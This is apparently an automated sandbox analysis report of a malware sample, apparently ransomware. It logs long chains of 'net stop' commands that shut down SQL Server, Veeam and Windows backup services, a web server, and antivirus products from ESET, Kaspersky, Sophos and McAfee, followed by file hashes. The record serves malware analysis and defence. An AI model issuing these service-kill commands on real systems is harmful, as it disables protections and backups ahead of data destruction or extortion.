C:\Windows\SysWOW64\net.exenet stop SQLAgent$ECWDB2 /y3⤵PID:4624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y4⤵PID:4712
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$PRACTTICEBGC /y2⤵PID:4796
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$PRACTTICEBGC /y3⤵PID:4692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y4⤵PID:4856
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$PRACTTICEMGT /y2⤵PID:4868
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$PRACTTICEMGT /y3⤵PID:4824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y4⤵PID:4920
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:4896
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:4968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y4⤵PID:5008
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$SBSMONITORING /y2⤵PID:5000
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SBSMONITORING /y3⤵PID:5056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y4⤵PID:5048
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$SHAREPOINT /y2⤵PID:1636
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SHAREPOINT /y3⤵PID:4108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y4⤵PID:2160
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$SQL_2008 /y2⤵PID:4284
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQL_2008 /y3⤵PID:4144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y4⤵PID:4376
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$SYSTEM_BGC /y2⤵PID:4404
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SYSTEM_BGC /y3⤵PID:4252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y4⤵PID:4432
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$TPS /y2⤵PID:4476
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$TPS /y3⤵PID:4568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y4⤵PID:4436
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$TPSAMA /y2⤵PID:4508
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$TPSAMA /y3⤵PID:4800
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y4⤵PID:4616
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:4696
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:4760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:4656
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y2⤵PID:4912
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$VEEAMSQL2012 /y3⤵PID:4756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y4⤵PID:4888
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLBrowser /y2⤵PID:5024
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser /y3⤵PID:4892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y4⤵PID:5100
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLSafeOLRService /y2⤵PID:5084
-
C:\Windows\SysWOW64\net.exenet stop SQLSafeOLRService /y3⤵PID:4264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y4⤵PID:4136
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLSERVERAGENT /y2⤵PID:2700
-
C:\Windows\SysWOW64\net.exenet stop SQLSERVERAGENT /y3⤵PID:4420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y4⤵PID:4180
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLTELEMETRY /y2⤵PID:4244
-
C:\Windows\SysWOW64\net.exenet stop SQLTELEMETRY /y3⤵PID:4348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y4⤵PID:4392
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y2⤵PID:4484
-
C:\Windows\SysWOW64\net.exenet stop SQLTELEMETRY$ECWDB2 /y3⤵PID:4520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y4⤵PID:4292
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLWriter /y2⤵PID:4596
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter /y3⤵PID:4628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y4⤵PID:4684
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamBackupSvc /y2⤵PID:4792
-
C:\Windows\SysWOW64\net.exenet stop VeeamBackupSvc /y3⤵PID:4924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y4⤵PID:5028
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamBrokerSvc /y2⤵PID:4808
-
C:\Windows\SysWOW64\net.exenet stop VeeamBrokerSvc /y3⤵PID:5096
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y4⤵PID:5064
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamCatalogSvc /y2⤵PID:5004
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc /y3⤵PID:3052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y4⤵PID:5104
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamCloudSvc /y2⤵PID:4140
-
C:\Windows\SysWOW64\net.exenet stop VeeamCloudSvc /y3⤵PID:4352
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y4⤵PID:4328
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamDeploymentService /y2⤵PID:4296
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploymentService /y3⤵PID:4336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵PID:4532
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamDeploySvc /y2⤵PID:4356
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploySvc /y3⤵PID:4600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y4⤵PID:4740
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamEnterpriseManagerSvc /y2⤵PID:4512
-
C:\Windows\SysWOW64\net.exenet stop VeeamEnterpriseManagerSvc /y3⤵PID:4748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y4⤵PID:4960
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamMountSvc /y2⤵PID:4844
-
C:\Windows\SysWOW64\net.exenet stop VeeamMountSvc /y3⤵PID:4816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y4⤵PID:4976
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamNFSSvc /y2⤵PID:4984
-
C:\Windows\SysWOW64\net.exenet stop VeeamNFSSvc /y3⤵PID:4232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵PID:4156
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamRESTSvc /y2⤵PID:4384
-
C:\Windows\SysWOW64\net.exenet stop VeeamRESTSvc /y3⤵PID:4256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y4⤵PID:4240
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamTransportSvc /y2⤵PID:4668
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc /y3⤵PID:4220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵PID:4852
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop W3Svc /y2⤵PID:4776
-
C:\Windows\SysWOW64\net.exenet stop W3Svc /y3⤵PID:4700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y4⤵PID:4932
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop wbengine /y2⤵PID:4848
-
C:\Windows\SysWOW64\net.exenet stop wbengine /y3⤵PID:4884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y4⤵PID:5060
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop WRSVC /y2⤵PID:4124
-
C:\Windows\SysWOW64\net.exenet stop WRSVC /y3⤵PID:2428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y4⤵PID:4964
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:4276
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:4216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:4188
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:4680
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:4456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:4768
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop VeeamHvIntegrationSvc /y2⤵PID:4828
-
C:\Windows\SysWOW64\net.exenet stop VeeamHvIntegrationSvc /y3⤵PID:4704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y4⤵PID:4744
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop swi_update /y2⤵PID:4996
-
C:\Windows\SysWOW64\net.exenet stop swi_update /y3⤵PID:1304
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y4⤵PID:4132
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$CXDB /y2⤵PID:4120
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$CXDB /y3⤵PID:4548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y4⤵PID:4168
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:4660
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:4440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y4⤵PID:4196
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "SQL Backups" /y2⤵PID:5080
-
C:\Windows\SysWOW64\net.exenet stop "SQL Backups" /y3⤵PID:4876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQL Backups" /y4⤵PID:4864
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$PROD /y2⤵PID:4980
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$PROD /y3⤵PID:4908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y4⤵PID:4648
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "Zoolz 2 Service" /y2⤵PID:4104
-
C:\Windows\SysWOW64\net.exenet stop "Zoolz 2 Service" /y3⤵PID:4452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service" /y4⤵PID:4472
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLServerADHelper /y2⤵PID:4640
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper /y3⤵PID:4948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y4⤵PID:4564
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$PROD /y2⤵PID:4972
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$PROD /y3⤵PID:4280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y4⤵PID:5092
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop msftesql$PROD /y2⤵PID:4940
-
C:\Windows\SysWOW64\net.exenet stop msftesql$PROD /y3⤵PID:4272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y4⤵PID:4820
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop NetMsmqActivator /y2⤵PID:4788
-
C:\Windows\SysWOW64\net.exenet stop NetMsmqActivator /y3⤵PID:4832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y4⤵PID:4364
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EhttpSrv /y2⤵PID:4340
-
C:\Windows\SysWOW64\net.exenet stop EhttpSrv /y3⤵PID:4736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y4⤵PID:4900
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ekrn /y2⤵PID:4720
-
C:\Windows\SysWOW64\net.exenet stop ekrn /y3⤵PID:4236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y4⤵PID:4732
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ESHASRV /y2⤵PID:4112
-
C:\Windows\SysWOW64\net.exenet stop ESHASRV /y3⤵PID:5076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y4⤵PID:5044
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SOPHOS /y2⤵PID:4560
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SOPHOS /y3⤵PID:1064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y4⤵PID:4540
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$SOPHOS /y2⤵PID:4516
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SOPHOS /y3⤵PID:4288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y4⤵PID:5116
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop AVP /y2⤵PID:4644
-
C:\Windows\SysWOW64\net.exenet stop AVP /y3⤵PID:4224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y4⤵PID:4716
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop klnagent /y2⤵PID:4388
-
C:\Windows\SysWOW64\net.exenet stop klnagent /y3⤵PID:4524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y4⤵PID:5036
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SQLEXPRESS /y2⤵PID:4312
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS /y3⤵PID:4300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y4⤵PID:4620
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$SQLEXPRESS /y2⤵PID:4100
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS /y3⤵PID:4468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y4⤵PID:4664
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop wbengine /y2⤵PID:4752
-
C:\Windows\SysWOW64\net.exenet stop wbengine /y3⤵PID:4544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y4⤵PID:4636
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop mfefire /y2⤵PID:5136
-
C:\Windows\SysWOW64\net.exenet stop mfefire /y3⤵PID:5172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y4⤵PID:5192
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:496
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5860
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
336de529bf2d2de65fa7a07f7ca5c68d
SHA1ea61415bf50252332e3d6ff930539649ca76f564
SHA256392f32aa93b4de2936cee1c612c28edefa06fc418d3cb2f7e708aee1330fe393
SHA512bb7263f705cd34aba3b5d36a57b6c94d893923162b56b17b4b7c20f825a16680cf3d1e19effabee582614a04914649dbe7b2eed6a40969cbc51f83e8b3b60e52
-
MD5
fc04e3e97405681f50624b8f36e12565
SHA1ed4c78d741cafc45f5addf8b15609e8692792213
SHA256cd91d1aaf69eff7cb3cff7f94072f5930351c684e5fc83b6a1eccc48391c5a84
SHA5122778fa2f0fdd797a803fa8fb54c0fd9e90c3cc16d5b45a8f2872e1341ab81dfae07c684fb0fbc6a6232d44c859acdb3b3227fe41dd4fe29f8c85788cfd6a58d3
-
MD5
b57034e4ec717f0feb4af4257491be68
SHA10020c412047ebeb894144ea8ebdae68b083fda4c
SHA25603324dadb717cd6ceeac8b593ce9ad6599e9d0e84b54909be77800464ca7172d
SHA512cfeccd60cecf272668e67a0e0825b49554b1109bf4457424496d583a1706dbed9dc0f3007a1e54d506677c29ea6f5acd7d2dd3dff7e8edde869a56805983b540